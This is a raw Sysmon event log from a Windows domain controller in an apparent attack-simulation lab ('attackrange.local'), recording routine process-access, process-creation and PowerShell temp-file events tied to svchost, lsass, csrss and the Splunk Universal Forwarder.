13:53:24.711{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002276Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.711{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002275Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.711{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002274Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.711{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002273Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.711{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002272Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.711{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002271Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.711{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8554-5FCF-6200-000000009101}2620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002270Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.711{10ACEC4A-8553-5FCF-5700-000000009101}40764072C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-8554-5FCF-6200-000000009101}2620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18226|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002269Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.715{10ACEC4A-8554-5FCF-6200-000000009101}2620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-8553-5FCF-5700-000000009101}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002268Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.664{10ACEC4A-8554-5FCF-6100-000000009101}27042672C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002267Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.477{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8554-5FCF-5E00-000000009101}2920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002266Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.477{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8554-5FCF-5E00-000000009101}2920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002265Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.445{10ACEC4A-8554-5FCF-5E00-000000009101}2920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_bihmfqx1.l2x.ps12020-12-08 13:53:24.445 10341000x80000000000000002264Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8554-5FCF-5E00-000000009101}2920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002263Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.430{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8554-5FCF-6100-000000009101}2704C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002262Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002261Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002260Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002259Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002256Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002255Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002254Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.430{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8554-5FCF-6100-000000009101}2704C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002253Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002252Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.419{10ACEC4A-8554-5FCF-6000-000000009101}25602792C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-8554-5FCF-6100-000000009101}2704C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002251Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.429{10ACEC4A-8554-5FCF-6100-000000009101}2704C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-8554-5FCF-6000-000000009101}2560C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 10341000x80000000000000002250Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.419{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8554-5FCF-6000-000000009101}2560C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 